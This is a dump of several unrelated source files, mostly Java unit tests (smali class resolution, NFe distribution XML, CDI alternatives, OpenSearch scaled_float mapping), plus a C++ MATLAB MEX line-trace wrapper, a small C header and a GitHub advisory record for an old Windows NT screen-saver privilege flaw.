* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package org.jf.smalidea;
import com.intellij.testFramework.fixtures.LightCodeInsightFixtureTestCase;
import org.jf.smalidea.psi.impl.SmaliClass;
import org.jf.smalidea.psi.impl.SmaliClassType;
import org.jf.smalidea.psi.impl.SmaliClassTypeElement;
import org.jf.smalidea.psi.impl.SmaliFile;
import org.junit.Assert;
public class SmaliClassTypeElementTest extends LightCodeInsightFixtureTestCase {

    // Resolving a plain top-level class reference: name, canonical text and
    // the resolved SmaliClass must all agree. "<ref>" marks the offset of the
    // reference under test inside the source text.
    public void testGetType() {
        myFixture.addFileToProject("my/blarg.smali",
                ".class public Lmy/blarg; " +
                        ".super Ljava/lang/Object;");

        String text = ".class public Lmy/pkg/blah; " +
                ".super Lmy/bl<ref>arg;";
        SmaliFile file = (SmaliFile)myFixture.addFileToProject("my/pkg/blah.smali",
                text.replace("<ref>", ""));

        SmaliClassTypeElement typeElement =
                (SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
        Assert.assertNotNull(typeElement);
        SmaliClassType type = typeElement.getType();

        Assert.assertEquals("blarg", typeElement.getName());
        Assert.assertEquals("my.blarg", typeElement.getCanonicalText());

        Assert.assertEquals("blarg", type.getClassName());
        Assert.assertEquals("my.blarg", type.getCanonicalText());

        // Both the element and its type should resolve to the same class.
        SmaliClass resolvedClass = (SmaliClass)typeElement.resolve();
        Assert.assertNotNull(resolvedClass);
        Assert.assertEquals("my.blarg", resolvedClass.getQualifiedName());

        resolvedClass = (SmaliClass)type.resolve();
        Assert.assertNotNull(resolvedClass);
        Assert.assertEquals("my.blarg", resolvedClass.getQualifiedName());
    }

    // Inner class in the default package: Outer$Inner maps to Outer.Inner.
    public void testSimpleInnerClass() {
        myFixture.addFileToProject("Outer.java", "" +
                "public class Outer {" +
                "    public static class Inner {" +
                "    }" +
                "}");

        String text = ".class public Lsmali; " +
                ".super LOuter$In<ref>ner;";

        SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));

        SmaliClassTypeElement typeElement =
                (SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
        Assert.assertNotNull(typeElement);
        SmaliClassType type = typeElement.getType();

        Assert.assertEquals("Outer.Inner", typeElement.getQualifiedName());
        Assert.assertEquals("Outer.Inner", type.getCanonicalText());
    }

    // Inner class inside a package: my/Outer$Inner maps to my.Outer.Inner.
    public void testInnerClassWithPackage() {
        myFixture.addFileToProject("my/Outer.java", "" +
                "package my;" +
                "public class Outer {" +
                "    public static class Inner {" +
                "    }" +
                "}");

        String text = ".class public Lsmali; " +
                ".super Lmy/Outer$In<ref>ner;";

        SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));

        SmaliClassTypeElement typeElement =
                (SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
        Assert.assertNotNull(typeElement);
        SmaliClassType type = typeElement.getType();

        Assert.assertEquals("my.Outer.Inner", typeElement.getQualifiedName());
        Assert.assertEquals("my.Outer.Inner", type.getCanonicalText());
    }

    // Class names that themselves contain '$': the resolver must pick the
    // correct split between outer and inner names.
    public void testComplexInnerClass() {
        myFixture.addFileToProject("my/Outer$blah.java", "" +
                "package my;" +
                "public class Outer$blah {" +
                "    public static class Inner {" +
                "    }" +
                "    public static class Inner$blah {" +
                "    }" +
                "}");

        String text = ".class public Lsmali; " +
                ".super Lmy/Outer$blah$In<ref>ner$blah;";

        SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));

        SmaliClassTypeElement typeElement =
                (SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
        Assert.assertNotNull(typeElement);
        SmaliClassType type = typeElement.getType();

        Assert.assertEquals("my.Outer$blah.Inner$blah", typeElement.getQualifiedName());
        Assert.assertEquals("my.Outer$blah.Inner$blah", type.getCanonicalText());

        text = ".class public Lsmali2; " +
                ".super Lmy/Outer$blah$In<ref>ner;";

        file = (SmaliFile)myFixture.addFileToProject("smali2.smali", text.replace("<ref>", ""));

        typeElement = (SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
        Assert.assertNotNull(typeElement);
        type = typeElement.getType();

        Assert.assertEquals("my.Outer$blah.Inner", typeElement.getQualifiedName());
        Assert.assertEquals("my.Outer$blah.Inner", type.getCanonicalText());
    }

    // Trailing '$' in both outer and inner names must survive resolution.
    public void testInnerClassTrailingDollar() {
        myFixture.addFileToProject("my/Outer$blah.java", "" +
                "package my;" +
                "public class Outer$ {" +
                "    public static class Inner$ {" +
                "    }" +
                "}");

        String text = ".class public Lsmali; " +
                ".super Lmy/Outer$$In<ref>ner$;";

        SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));

        SmaliClassTypeElement typeElement =
                (SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
        Assert.assertNotNull(typeElement);
        SmaliClassType type = typeElement.getType();

        Assert.assertEquals("my.Outer$.Inner$", typeElement.getQualifiedName());
        Assert.assertEquals("my.Outer$.Inner$", type.getCanonicalText());
    }
}
| 3,070 |
568 | <reponame>arthurrib/nfe<gh_stars>100-1000
package com.fincatto.documentofiscal.nfe.classes.distribuicao;
import com.fincatto.documentofiscal.DFAmbiente;
import com.fincatto.documentofiscal.DFUnidadeFederativa;
import org.junit.Assert;
import org.junit.Test;
public class NFDistribuicaoIntTest {

    /** Ambiente set on the request should be readable back. */
    @Test
    public void deveGerarAmbienteHomologacao() {
        final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
        distribuicaoInt.setAmbiente(DFAmbiente.HOMOLOGACAO);
        Assert.assertEquals(DFAmbiente.HOMOLOGACAO, distribuicaoInt.getAmbiente());
    }

    /** Serializing without a version must fail fast with IllegalStateException. */
    @Test(expected = IllegalStateException.class)
    public void naoDeveAceitarVersaoNula(){
        final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
        distribuicaoInt.setAmbiente(DFAmbiente.HOMOLOGACAO);
        distribuicaoInt.toString();
    }

    /** Version set on the request should be readable back. */
    @Test
    public void deveGerarVersao100() {
        final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
        distribuicaoInt.setVersao("1.00");
        Assert.assertEquals("1.00", distribuicaoInt.getVersao());
    }

    /**
     * UF autor set on the request should be readable back.
     * Fix: this method was missing its {@code @Test} annotation, so JUnit 4
     * silently never executed it.
     */
    @Test
    public void deveGerarConsultaDaBA(){
        final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
        distribuicaoInt.setUnidadeFederativaAutor(DFUnidadeFederativa.BA);
        Assert.assertEquals(DFUnidadeFederativa.BA, distribuicaoInt.getUnidadeFederativaAutor());
    }

    /** A fully populated request must serialize to the expected XML payload. */
    @Test
    public void deveGerarXmlCorretamente() {
        final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
        distribuicaoInt.setAmbiente(DFAmbiente.HOMOLOGACAO);
        distribuicaoInt.setCnpj("00000000000000");
        distribuicaoInt.setVersao("1.00");
        distribuicaoInt.setConsultaChaveAcesso(new NFDistribuicaoConsultaChaveAcesso().setChaveAcesso("12345678901234567890123456789012345678901234"));

        final String retorno = "<distDFeInt versao=\"1.00\" xmlns=\"http://www.portalfiscal.inf.br/nfe\"><tpAmb>2</tpAmb><CNPJ>00000000000000</CNPJ><consChNFe><chNFe>12345678901234567890123456789012345678901234</chNFe></consChNFe></distDFeInt>";
        Assert.assertEquals(retorno, distribuicaoInt.toString());
    }
}
| 963 |
765 | // Copyright 2016 Google Inc, NYU.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include <stdio.h>
#include <string>
#include "stdint.h"
#include <math.h>
#include <memory>
#include "mex.h"
#define MATLAB_BUILD
#define TH_CONCAT_4(x,y,z,w) TH_CONCAT_4_EXPAND(x,y,z,w)
#define TH_CONCAT_4_EXPAND(x,y,z,w) x ## y ## z ## w
#define TH_CONCAT_3(x,y,z) TH_CONCAT_3_EXPAND(x,y,z)
#define TH_CONCAT_3_EXPAND(x,y,z) x ## y ## z
#define THTensor TH_CONCAT_3(TH,Real,Tensor)
#define THTensor_(NAME) TH_CONCAT_4(TH,Real,Tensor_,NAME)
#define torch_(NAME) TH_CONCAT_3(torch_, Real, NAME)
#define torch_Tensor TH_CONCAT_STRING_3(torch., Real, Tensor)
#define tfluids_(NAME) TH_CONCAT_3(tfluids_, Real, NAME)
#define real float
#define accreal double
#define Real Float
#define THInf FLT_MAX
#define TH_REAL_IS_FLOAT
#define __host__
#define __device__
// Torch error hook: route TH errors into MATLAB's error mechanism so a
// failure raises a MATLAB error (aborting this MEX call) instead of crashing.
void THError(const char* c_str) {
  mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:error", c_str);
}
// Create our own fake tensor class.
// Minimal stand-in for the real THTensor: sizes, strides, dimension count
// and an owning float buffer — just enough for the included grid code.
typedef struct THTensor {
  std::unique_ptr<long[]> size;
  std::unique_ptr<long[]> stride;
  int nDimension;
  std::unique_ptr<real[]> storage;
} THTensor;
// Mirror of the TH API accessor: returns the raw, non-owning pointer to the
// tensor's element storage.
real* THTensor_(data)(const THTensor* self) {
  return self->storage.get();
}
#include "generic/stack_trace.cc"
#include "generic/int3.cu.h"
// Clamp x into [low, high]. Applies the upper bound first and the lower
// bound second, matching std::max(std::min(x, high), low) exactly (so for a
// degenerate range where low > high, the result is low).
inline int32_t clamp(const int32_t x, const int32_t low, const int32_t high) {
  int32_t bounded = x;
  if (bounded > high) {
    bounded = high;
  }
  if (bounded < low) {
    bounded = low;
  }
  return bounded;
}
#include "generic/vec3.cc"
#include "third_party/cell_type.h"
#include "third_party/grid.cc"
#include "calc_line_trace.cc"
using namespace std;
#define mexAssert(cond, str) \
{ \
if (!(cond)) { \
mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:failedAssertion", str); \
} \
}
// Extract a [1, 3] MATLAB double row vector into a tfluids vec3 (x, y, z
// order). Aborts the MEX call via mexAssert on any shape mismatch.
void getVec3(const mxArray* prhs, tfluids_(vec3)* pos) {
  mexAssert(mxGetNumberOfDimensions(prhs) == 2, "ERROR: vector not 2D");
  const mwSize* sz = mxGetDimensions(prhs);
  mexAssert(sz[0] == 1 && sz[1] == 3, "ERROR: vector not size [1, 3]");
  const double* posMat = mxGetPr(prhs);
  pos->x = posMat[0];
  pos->y = posMat[1];
  pos->z = posMat[2];
}
// Extract a [1, 3] MATLAB double row vector into an Int3, converting each
// component with static_cast<int> (truncation toward zero).
// Aborts the MEX call via mexAssert on any shape mismatch.
void getInt3(const mxArray* prhs, Int3* pos) {
  mexAssert(mxGetNumberOfDimensions(prhs) == 2, "ERROR: vector not 2D");
  const mwSize* sz = mxGetDimensions(prhs);
  mexAssert(sz[0] == 1 && sz[1] == 3, "ERROR: vector not size [1, 3]");
  const double* posMat = mxGetPr(prhs);
  pos->x = static_cast<int>(posMat[0]);
  pos->y = static_cast<int>(posMat[1]);
  pos->z = static_cast<int>(posMat[2]);
}
// The gateway function.
// MATLAB entry point: [collided, new_pos] = CalcLineTrace(pos, delta, dims, obs)
// Traces a ray from pos along delta through an obstacle grid of size dims and
// returns whether it collided plus the final position.
void mexFunction(int nlhs, mxArray *plhs[], int nrhs, const mxArray *prhs[]) {
  // Exactly 4 inputs required (note: an earlier comment here said 5; the
  // code has always checked for 4).
  if (nrhs != 4) {
    mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:invalidNumInputs",
                      "Input must be pos, delta, dims, obs");
  }

  // input must be pos, delta, dims, obs.
  for (int i = 0; i < 4; i++) {
    if (mxIsDouble(prhs[i]) != 1) {
      mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:notDouble",
                        "Inputs must be double.");
    }
  }

  // Check that the inputs are the right size.
  // 0: pos
  tfluids_(vec3) pos;
  getVec3(prhs[0], &pos);
  // mexPrintf("pos = %f %f %f\n", pos.x, pos.y, pos.z);

  // 1: delta
  tfluids_(vec3) delta;
  getVec3(prhs[1], &delta);
  // mexPrintf("delta = %f %f %f\n", delta.x, delta.y, delta.z);

  // 2: dims
  Int3 dims;
  getInt3(prhs[2], &dims);
  // mexPrintf("dims = %d %d %d\n", dims.x, dims.y, dims.z);

  // 3: obs (occupancy grid; a 2D array is accepted for single-slice grids)
  const int obs_dim = static_cast<int>(mxGetNumberOfDimensions(prhs[3]));
  mexAssert(obs_dim == 3 || obs_dim == 2, "ERROR: obs not 3D or 2D");
  const mwSize* sz = mxGetDimensions(prhs[3]);
  if (obs_dim == 2) {
    mexAssert(sz[0] == dims.x, "ERROR: obs size mismatch.");
    mexAssert(sz[1] == dims.y, "ERROR: obs size mismatch.");
  } else {
    mexAssert(sz[0] == dims.x, "ERROR: obs size mismatch.");
    mexAssert(sz[1] == dims.y, "ERROR: obs size mismatch.");
    mexAssert(sz[2] == dims.z, "ERROR: obs size mismatch.");
  }
  const double* obs = mxGetPr(prhs[3]);

  // Convert the obs to a flag grid.
  // Build a fake 5D tensor (batch, chan, z, y, x) over a freshly allocated
  // buffer so the bundled FlagGrid code can consume it.
  THTensor flags_tensor;  // Create a fake tensor.
  flags_tensor.nDimension = 5;
  flags_tensor.size.reset(new long[flags_tensor.nDimension]);
  flags_tensor.stride.reset(new long[flags_tensor.nDimension]);
  flags_tensor.size[0] = 1;  // batch
  flags_tensor.size[1] = 1;  // chan
  flags_tensor.size[2] = dims.z;
  flags_tensor.size[3] = dims.y;
  flags_tensor.size[4] = dims.x;
  // Strides in elements, x fastest-varying.
  flags_tensor.stride[4] = 1;
  flags_tensor.stride[3] = dims.x;
  flags_tensor.stride[2] = dims.x * dims.y;
  flags_tensor.stride[1] = dims.x * dims.y * dims.z;
  flags_tensor.stride[0] = dims.x * dims.y * dims.z * 1;
  flags_tensor.storage.reset(new real[dims.z * dims.y * dims.x]);
  // Positive obs values mark obstacle cells; everything else is fluid.
  for (int k = 0; k < dims.z; k++) {
    for (int j = 0; j < dims.y; j++) {
      for (int i = 0; i < dims.x; i++) {
        const int index = k * dims.x * dims.y + j * dims.x + i;
        if (obs[index] > 0) {
          flags_tensor.storage[index] = TypeObstacle;
        } else {
          flags_tensor.storage[index] = TypeFluid;
        }
      }
    }
  }
  bool is_3d = dims.z > 1;
  tfluids_(FlagGrid) flags(&flags_tensor, is_3d);

  // Call the actual C function.
  tfluids_(vec3) new_pos;
  const int32_t ibatch = 0;
  const bool do_trace = true;
  const bool collided = calcLineTrace(pos, delta, flags, ibatch, &new_pos,
                                      do_trace);

  // Only 2 outputs allowed
  if (nlhs != 2) {
    mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:invalidNumOutputs",
                      "Two outputs required: [collide, new_pos].");
  }

  // Allocate the outputs and set them.
  plhs[0] = mxCreateDoubleScalar(static_cast<double>(collided));
  plhs[1] = mxCreateDoubleMatrix(1, 3, mxREAL);
  double* new_pos_mex = mxGetPr(plhs[1]);
  new_pos_mex[0] = new_pos.x;
  new_pos_mex[1] = new_pos.y;
  new_pos_mex[2] = new_pos.z;
}
| 2,772 |
2,150 | package org.javaee7.cdi.alternatives.priority;
import org.jboss.arquillian.container.test.api.Deployment;
import org.jboss.arquillian.junit.Arquillian;
import org.jboss.shrinkwrap.api.Archive;
import org.jboss.shrinkwrap.api.ShrinkWrap;
import org.jboss.shrinkwrap.api.spec.JavaArchive;
import org.junit.Test;
import org.junit.runner.RunWith;
import javax.enterprise.inject.spi.Bean;
import javax.enterprise.inject.spi.BeanManager;
import javax.inject.Inject;
import java.util.Set;
import static org.junit.Assert.assertTrue;
/**
* @author <NAME>
*/
@RunWith(Arquillian.class)
public class MixedGreetingTest {

    /** Deploy the Greeting implementations plus a beans.xml (alternatives config). */
    @Deployment
    public static Archive<?> deploy() {
        return ShrinkWrap.create(JavaArchive.class)
                .addClasses(Greeting.class, SimpleGreeting.class, FancyGreeting.class)
                .addAsManifestResource("beans-alternatives.xml", "beans.xml");
    }

    @Inject
    BeanManager beanManager;

    // Two candidate beans should be resolvable for Greeting — presumably both
    // alternatives are enabled in beans-alternatives.xml; verify there.
    @Test
    public void should_be_ambiguous() throws Exception {
        Set<Bean<?>> beans = beanManager.getBeans(Greeting.class);
        assertTrue(beans.size() == 2);
    }
}
| 442 |
4,822 | <reponame>gaiksaya/OpenSearch<gh_stars>1000+
/*
* SPDX-License-Identifier: Apache-2.0
*
* The OpenSearch Contributors require contributions made to
* this file be licensed under the Apache-2.0 license or a
* compatible open source license.
*/
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Modifications Copyright OpenSearch Contributors. See
* GitHub history for details.
*/
package org.opensearch.index.mapper;
import org.apache.lucene.index.DocValuesType;
import org.apache.lucene.index.IndexableField;
import org.opensearch.common.Strings;
import org.opensearch.common.bytes.BytesReference;
import org.opensearch.common.xcontent.XContentBuilder;
import org.opensearch.common.xcontent.XContentFactory;
import org.opensearch.common.xcontent.XContentType;
import org.opensearch.plugins.Plugin;
import java.io.IOException;
import java.util.Arrays;
import java.util.Collection;
import java.util.List;
import static java.util.Collections.singletonList;
import static org.hamcrest.Matchers.containsString;
public class ScaledFloatFieldMapperTests extends MapperTestCase {
@Override
protected Collection<? extends Plugin> getPlugins() {
return singletonList(new MapperExtrasPlugin());
}
@Override
protected void writeFieldValue(XContentBuilder builder) throws IOException {
builder.value(123);
}
@Override
protected void minimalMapping(XContentBuilder b) throws IOException {
b.field("type", "scaled_float").field("scaling_factor", 10.0);
}
@Override
protected void registerParameters(ParameterChecker checker) throws IOException {
checker.registerConflictCheck("scaling_factor", fieldMapping(this::minimalMapping), fieldMapping(b -> {
b.field("type", "scaled_float");
b.field("scaling_factor", 5.0);
}));
checker.registerConflictCheck("doc_values", b -> b.field("doc_values", false));
checker.registerConflictCheck("index", b -> b.field("index", false));
checker.registerConflictCheck("store", b -> b.field("store", true));
checker.registerConflictCheck("null_value", b -> b.field("null_value", 1));
checker.registerUpdateCheck(b -> b.field("coerce", false), m -> assertFalse(((ScaledFloatFieldMapper) m).coerce()));
checker.registerUpdateCheck(
b -> b.field("ignore_malformed", true),
m -> assertTrue(((ScaledFloatFieldMapper) m).ignoreMalformed())
);
}
public void testExistsQueryDocValuesDisabled() throws IOException {
MapperService mapperService = createMapperService(fieldMapping(b -> {
minimalMapping(b);
b.field("doc_values", false);
}));
assertExistsQuery(mapperService);
assertParseMinimalWarnings();
}
public void testDefaults() throws Exception {
XContentBuilder mapping = fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0));
DocumentMapper mapper = createDocumentMapper(mapping);
assertEquals(Strings.toString(mapping), mapper.mappingSource().toString());
ParsedDocument doc = mapper.parse(source(b -> b.field("field", 123)));
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(2, fields.length);
IndexableField pointField = fields[0];
assertEquals(1, pointField.fieldType().pointDimensionCount());
assertFalse(pointField.fieldType().stored());
assertEquals(1230, pointField.numericValue().longValue());
IndexableField dvField = fields[1];
assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
assertEquals(1230, dvField.numericValue().longValue());
assertFalse(dvField.fieldType().stored());
}
public void testMissingScalingFactor() {
Exception e = expectThrows(
MapperParsingException.class,
() -> createMapperService(fieldMapping(b -> b.field("type", "scaled_float")))
);
assertThat(e.getMessage(), containsString("Failed to parse mapping [_doc]: Field [scaling_factor] is required"));
}
public void testIllegalScalingFactor() {
Exception e = expectThrows(
MapperParsingException.class,
() -> createMapperService(fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", -1)))
);
assertThat(e.getMessage(), containsString("[scaling_factor] must be a positive number, got [-1.0]"));
}
public void testNotIndexed() throws Exception {
DocumentMapper mapper = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("index", false).field("scaling_factor", 10.0))
);
ParsedDocument doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", 123).endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(1, fields.length);
IndexableField dvField = fields[0];
assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
assertEquals(1230, dvField.numericValue().longValue());
}
public void testNoDocValues() throws Exception {
DocumentMapper mapper = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("doc_values", false).field("scaling_factor", 10.0))
);
ParsedDocument doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", 123).endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(1, fields.length);
IndexableField pointField = fields[0];
assertEquals(1, pointField.fieldType().pointDimensionCount());
assertEquals(1230, pointField.numericValue().longValue());
}
    /**
     * With {@code store=true} three Lucene fields are produced for one value:
     * the indexed point field, the doc-values field, and the stored field —
     * all holding the scaled long 1230 (123 * scaling_factor 10).
     */
    public void testStore() throws Exception {
        DocumentMapper mapper = createDocumentMapper(
            fieldMapping(b -> b.field("type", "scaled_float").field("store", true).field("scaling_factor", 10.0))
        );
        ParsedDocument doc = mapper.parse(
            new SourceToParse(
                "test",
                "_doc",
                "1",
                BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", 123).endObject()),
                XContentType.JSON
            )
        );
        IndexableField[] fields = doc.rootDoc().getFields("field");
        assertEquals(3, fields.length);
        IndexableField pointField = fields[0];
        assertEquals(1, pointField.fieldType().pointDimensionCount());
        assertEquals(1230, pointField.numericValue().doubleValue(), 0d);
        IndexableField dvField = fields[1];
        assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
        IndexableField storedField = fields[2];
        assertTrue(storedField.fieldType().stored());
        assertEquals(1230, storedField.numericValue().longValue());
    }
    /**
     * By default, string-encoded numbers ("123") are coerced to numeric values;
     * with {@code coerce=false} the same input must be rejected at parse time.
     */
    public void testCoerce() throws Exception {
        DocumentMapper mapper = createDocumentMapper(fieldMapping(this::minimalMapping));
        ParsedDocument doc = mapper.parse(
            new SourceToParse(
                "test",
                "_doc",
                "1",
                BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", "123").endObject()),
                XContentType.JSON
            )
        );
        IndexableField[] fields = doc.rootDoc().getFields("field");
        assertEquals(2, fields.length);
        IndexableField pointField = fields[0];
        assertEquals(1, pointField.fieldType().pointDimensionCount());
        assertEquals(1230, pointField.numericValue().longValue());
        IndexableField dvField = fields[1];
        assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());

        // Same string input with coercion disabled must throw.
        DocumentMapper mapper2 = createDocumentMapper(
            fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0).field("coerce", false))
        );
        ThrowingRunnable runnable = () -> mapper2.parse(
            new SourceToParse(
                "test",
                "_doc",
                "1",
                BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", "123").endObject()),
                XContentType.JSON
            )
        );
        MapperParsingException e = expectThrows(MapperParsingException.class, runnable);
        assertThat(e.getCause().getMessage(), containsString("passed as String"));
    }
    /** Non-numeric strings and non-finite values are malformed input for scaled_float. */
    public void testIgnoreMalformed() throws Exception {
        doTestIgnoreMalformed("a", "For input string: \"a\"");

        List<String> values = Arrays.asList("NaN", "Infinity", "-Infinity");
        for (String value : values) {
            doTestIgnoreMalformed(value, "[scaled_float] only supports finite values, but got [" + value + "]");
        }
    }
    /**
     * Asserts that parsing {@code value} fails with a message containing
     * {@code exceptionMessageContains} under the default mapping, and that the
     * same value is silently dropped (no fields indexed) when
     * {@code ignore_malformed=true}.
     */
    private void doTestIgnoreMalformed(String value, String exceptionMessageContains) throws Exception {
        DocumentMapper mapper = createDocumentMapper(fieldMapping(this::minimalMapping));
        ThrowingRunnable runnable = () -> mapper.parse(
            new SourceToParse(
                "test",
                "_doc",
                "1",
                BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", value).endObject()),
                XContentType.JSON
            )
        );
        MapperParsingException e = expectThrows(MapperParsingException.class, runnable);
        assertThat(e.getCause().getMessage(), containsString(exceptionMessageContains));

        // With ignore_malformed the document parses but the field is skipped entirely.
        DocumentMapper mapper2 = createDocumentMapper(
            fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0).field("ignore_malformed", true))
        );
        ParsedDocument doc = mapper2.parse(
            new SourceToParse(
                "test",
                "_doc",
                "1",
                BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", value).endObject()),
                XContentType.JSON
            )
        );
        IndexableField[] fields = doc.rootDoc().getFields("field");
        assertEquals(0, fields.length);
    }
    /**
     * A JSON null produces no fields by default; with {@code null_value=2.5}
     * the substitute value is scaled (2.5 * 10 = 25) and indexed instead.
     */
    public void testNullValue() throws IOException {
        DocumentMapper mapper = createDocumentMapper(fieldMapping(this::minimalMapping));
        ParsedDocument doc = mapper.parse(
            new SourceToParse(
                "test",
                "_doc",
                "1",
                BytesReference.bytes(XContentFactory.jsonBuilder().startObject().nullField("field").endObject()),
                XContentType.JSON
            )
        );
        assertArrayEquals(new IndexableField[0], doc.rootDoc().getFields("field"));

        mapper = createDocumentMapper(
            fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0).field("null_value", 2.5))
        );
        doc = mapper.parse(
            new SourceToParse(
                "test",
                "_doc",
                "1",
                BytesReference.bytes(XContentFactory.jsonBuilder().startObject().nullField("field").endObject()),
                XContentType.JSON
            )
        );
        IndexableField[] fields = doc.rootDoc().getFields("field");
        assertEquals(2, fields.length);
        IndexableField pointField = fields[0];
        assertEquals(1, pointField.fieldType().pointDimensionCount());
        assertFalse(pointField.fieldType().stored());
        assertEquals(25, pointField.numericValue().longValue());
        IndexableField dvField = fields[1];
        assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
        assertFalse(dvField.fieldType().stored());
    }
    /**
     * `index_options` was deprecated and is rejected as of 7.0
     *
     * NOTE(review): the mapping here omits scaling_factor, so the parse error
     * asserted below is the missing-scaling_factor failure; the deprecation
     * warning for index_options is still expected to have been emitted.
     */
    public void testRejectIndexOptions() {
        MapperParsingException e = expectThrows(
            MapperParsingException.class,
            () -> createMapperService(fieldMapping(b -> b.field("type", "scaled_float").field("index_options", randomIndexOptions())))
        );
        assertThat(e.getMessage(), containsString("Failed to parse mapping [_doc]: Field [scaling_factor] is required"));
        assertWarnings("Parameter [index_options] has no effect on type [scaled_float] and will be removed in future");
    }
}
| 5,523 |
/* cmupvdbg.h -- cmupv debug function declarations */

/* Normally, this function(s) are not called and the corresponding
 * cmupvdbg.c need not be linked
 */

/* See comments in cmupvdbg.c and definitions of MAX_FILES and MAX_SAVE */

/* write_pv_frame -- saves an array of floats as a sound file so you
 * can see what is going into the phase vocoder
 *
 * Parameters (assumed from the signature -- confirm against cmupvdbg.c):
 *   zeros     - presumably a count of leading zero samples / offset
 *   ana_frame - analysis frame samples to dump
 *   fftsize   - number of samples in ana_frame
 *   prefix    - filename prefix for the generated sound file
 */
void write_pv_frame(long zeros, float *ana_frame, long fftsize, char *prefix);
| 137 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-9h86-j86m-7fx3",
"modified": "2022-04-30T18:10:29Z",
"published": "2022-04-30T18:10:29Z",
"aliases": [
"CVE-1999-0382"
],
"details": "The screen saver in Windows NT does not verify that its security context has been changed properly, allowing attackers to run programs with elevated privileges.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-1999-0382"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-008"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "HIGH",
"github_reviewed": false
}
} | 341 |
5,169 | <reponame>Gantios/Specs
{
